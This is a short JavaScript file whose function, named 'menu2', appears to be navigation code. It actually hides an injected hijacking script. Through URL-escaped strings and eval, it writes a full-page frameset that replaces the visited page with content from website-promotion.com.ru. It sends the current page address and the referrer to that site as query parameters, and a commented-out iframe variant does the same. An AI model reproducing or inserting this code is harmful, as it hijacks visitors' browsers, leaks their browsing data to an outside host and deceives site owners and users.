function menu2(nemz)
{
//alert(nemz);
var akeyw=unescape(nemz);
var ref=encodeURIComponent(document.referrer);
var page=encodeURIComponent(window.location.href);
var s1=akeyw+'&p='+page+'&ref='+ref;
var s=unescape("script");
s=s+unescape("%3D%22%3Cframeset%20rows%3D%27%2A%2C0%27%20border%3D0%3E%3Cframe%20src%3D%27http%3A%2F%2Fwebsite-promotion%2Ecom%2Eru%2Fsearch%2Fs%2Ephp%3Fk%3D");
s=s+s1;
s=s+unescape("%27%3E%3C%2Fframeset%3E%22%3B%0D%0Adocument%2Ewrite%28script%29%3B%0D")+unescape("%0A");
var k=3;
if (5>k)
{
  eval(s);
}  
//alert(s);

//var s2='<iframe src="http://website-promotion.com.ru/search/s.php?k='+s1+'" frameborder="0" marginheight="0" marginwidth="0" width="1800" height="1800"></iframe>';
//document.write(s2);

}


